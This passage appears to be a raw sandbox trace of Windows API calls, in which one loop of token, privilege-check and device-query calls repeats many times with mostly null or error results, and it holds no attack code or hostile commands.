[0084.851] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.851] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.851] GetLastError () returned 0x578 [0084.851] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.851] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.851] GetCurrentThread () returned 0xfffffffe [0084.851] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.851] GetLastError () returned 0x3f0 [0084.851] GetCurrentProcess () returned 0xffffffff [0084.851] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.851] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.851] SetLastError (dwErrCode=0x522) [0084.851] CloseHandle (hObject=0x114) returned 1 [0084.851] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.851] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.851] GetLastError () returned 0x578 [0084.851] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.851] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.851] GetCurrentThread () returned 0xfffffffe [0084.851] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.851] GetLastError () returned 0x3f0 [0084.851] GetCurrentProcess () returned 0xffffffff [0084.851] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.851] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.851] SetLastError (dwErrCode=0x522) [0084.851] CloseHandle (hObject=0x114) returned 1 [0084.851] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.851] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.851] GetLastError () returned 0x578 [0084.851] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.851] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.851] GetCurrentThread () returned 0xfffffffe [0084.851] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.851] GetLastError () returned 0x3f0 [0084.851] GetCurrentProcess () returned 0xffffffff [0084.851] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.851] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.851] SetLastError (dwErrCode=0x522) [0084.851] CloseHandle (hObject=0x114) returned 1 [0084.851] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.851] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.851] GetLastError () returned 0x578 [0084.852] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.852] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.852] GetCurrentThread () returned 0xfffffffe [0084.852] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.852] GetLastError () returned 0x3f0 [0084.852] GetCurrentProcess () returned 0xffffffff [0084.852] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.852] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.852] SetLastError (dwErrCode=0x522) [0084.852] CloseHandle (hObject=0x114) returned 1 [0084.852] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.852] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.852] GetLastError () returned 0x578 [0084.852] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.852] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.852] GetCurrentThread () returned 0xfffffffe [0084.852] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.852] GetLastError () returned 0x3f0 [0084.852] GetCurrentProcess () returned 0xffffffff [0084.852] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.852] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.852] SetLastError (dwErrCode=0x522) [0084.852] CloseHandle (hObject=0x114) returned 1 [0084.852] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.852] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.852] GetLastError () returned 0x578 [0084.852] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.852] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.852] GetCurrentThread () returned 0xfffffffe [0084.852] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.852] GetLastError () returned 0x3f0 [0084.852] GetCurrentProcess () returned 0xffffffff [0084.852] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.852] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.852] SetLastError (dwErrCode=0x522) [0084.852] CloseHandle (hObject=0x114) returned 1 [0084.852] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.852] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.852] GetLastError () returned 0x578 [0084.852] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.852] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.852] GetCurrentThread () returned 0xfffffffe [0084.852] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.852] GetLastError () returned 0x3f0 [0084.852] GetCurrentProcess () returned 0xffffffff [0084.852] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.852] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.853] SetLastError (dwErrCode=0x522) [0084.853] CloseHandle (hObject=0x114) returned 1 [0084.853] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.853] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.853] GetLastError () returned 0x578 [0084.853] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.853] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.853] GetCurrentThread () returned 0xfffffffe [0084.853] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.853] GetLastError () returned 0x3f0 [0084.853] GetCurrentProcess () returned 0xffffffff [0084.853] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.853] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.853] SetLastError (dwErrCode=0x522) [0084.853] CloseHandle (hObject=0x114) returned 1 [0084.853] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.853] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.853] GetLastError () returned 0x578 [0084.853] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.853] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.853] GetCurrentThread () returned 0xfffffffe [0084.853] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.853] GetLastError () returned 0x3f0 [0084.853] GetCurrentProcess () returned 0xffffffff [0084.853] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.853] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.853] SetLastError (dwErrCode=0x522) [0084.853] CloseHandle (hObject=0x114) returned 1 [0084.853] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.853] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.853] GetLastError () returned 0x578 [0084.853] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.853] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.853] GetCurrentThread () returned 0xfffffffe [0084.853] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.853] GetLastError () returned 0x3f0 [0084.853] GetCurrentProcess () returned 0xffffffff [0084.853] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.853] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.853] SetLastError (dwErrCode=0x522) [0084.853] CloseHandle (hObject=0x114) returned 1 [0084.853] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.853] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.853] GetLastError () returned 0x578 [0084.853] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.853] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.853] GetCurrentThread () returned 0xfffffffe [0084.853] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.854] GetLastError () returned 0x3f0 [0084.854] GetCurrentProcess () returned 0xffffffff [0084.854] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.854] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.854] SetLastError (dwErrCode=0x522) [0084.854] CloseHandle (hObject=0x114) returned 1 [0084.854] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.854] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.854] GetLastError () returned 0x578 [0084.854] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.854] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.854] GetCurrentThread () returned 0xfffffffe [0084.854] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.854] GetLastError () returned 0x3f0 [0084.854] GetCurrentProcess () returned 0xffffffff [0084.854] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.854] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.854] SetLastError (dwErrCode=0x522) [0084.854] CloseHandle (hObject=0x114) returned 1 [0084.854] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.854] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.854] GetLastError () returned 0x578 [0084.854] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.854] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.854] GetCurrentThread () returned 0xfffffffe [0084.854] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.854] GetLastError () returned 0x3f0 [0084.854] GetCurrentProcess () returned 0xffffffff [0084.854] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.854] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.854] SetLastError (dwErrCode=0x522) [0084.854] CloseHandle (hObject=0x114) returned 1 [0084.854] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.854] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.854] GetLastError () returned 0x578 [0084.854] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.854] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.854] GetCurrentThread () returned 0xfffffffe [0084.854] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.854] GetLastError () returned 0x3f0 [0084.854] GetCurrentProcess () returned 0xffffffff [0084.854] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.854] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.854] SetLastError (dwErrCode=0x522) [0084.854] CloseHandle (hObject=0x114) returned 1 [0084.854] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.854] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.855] GetLastError () returned 0x578 [0084.855] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.855] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.855] GetCurrentThread () returned 0xfffffffe [0084.855] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.855] GetLastError () returned 0x3f0 [0084.855] GetCurrentProcess () returned 0xffffffff [0084.855] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.855] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.855] SetLastError (dwErrCode=0x522) [0084.855] CloseHandle (hObject=0x114) returned 1 [0084.855] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.855] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.855] GetLastError () returned 0x578 [0084.855] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.855] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.855] GetCurrentThread () returned 0xfffffffe [0084.855] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.855] GetLastError () returned 0x3f0 [0084.855] GetCurrentProcess () returned 0xffffffff [0084.855] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.855] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.855] SetLastError (dwErrCode=0x522) [0084.855] CloseHandle (hObject=0x114) returned 1 [0084.855] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.855] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.855] GetLastError () returned 0x578 [0084.855] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.855] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.855] GetCurrentThread () returned 0xfffffffe [0084.855] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.855] GetLastError () returned 0x3f0 [0084.855] GetCurrentProcess () returned 0xffffffff [0084.855] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.855] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.855] SetLastError (dwErrCode=0x522) [0084.855] CloseHandle (hObject=0x114) returned 1 [0084.855] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.855] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.855] GetLastError () returned 0x578 [0084.855] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.855] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.855] GetCurrentThread () returned 0xfffffffe [0084.855] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.856] GetLastError () returned 0x3f0 [0084.856] GetCurrentProcess () returned 0xffffffff [0084.856] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.856] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.856] SetLastError (dwErrCode=0x522) [0084.856] CloseHandle (hObject=0x114) returned 1 [0084.856] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.856] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.856] GetLastError () returned 0x578 [0084.856] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.856] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.856] GetCurrentThread () returned 0xfffffffe [0084.856] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.856] GetLastError () returned 0x3f0 [0084.856] GetCurrentProcess () returned 0xffffffff [0084.856] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.856] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.856] SetLastError (dwErrCode=0x522) [0084.856] CloseHandle (hObject=0x114) returned 1 [0084.856] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.856] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.856] GetLastError () returned 0x578 [0084.856] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.856] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.856] GetCurrentThread () returned 0xfffffffe [0084.856] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.856] GetLastError () returned 0x3f0 [0084.856] GetCurrentProcess () returned 0xffffffff [0084.856] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.856] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.856] SetLastError (dwErrCode=0x522) [0084.856] CloseHandle (hObject=0x114) returned 1 [0084.856] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.856] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.856] GetLastError () returned 0x578 [0084.856] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.856] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.856] GetCurrentThread () returned 0xfffffffe [0084.856] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.856] GetLastError () returned 0x3f0 [0084.856] GetCurrentProcess () returned 0xffffffff [0084.856] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.856] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.856] SetLastError (dwErrCode=0x522) [0084.856] CloseHandle (hObject=0x114) returned 1 [0084.856] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.856] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.856] GetLastError () returned 0x578 [0084.856] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.856] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.857] GetCurrentThread () returned 0xfffffffe [0084.857] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.857] GetLastError () returned 0x3f0 [0084.857] GetCurrentProcess () returned 0xffffffff [0084.857] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.857] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.857] SetLastError 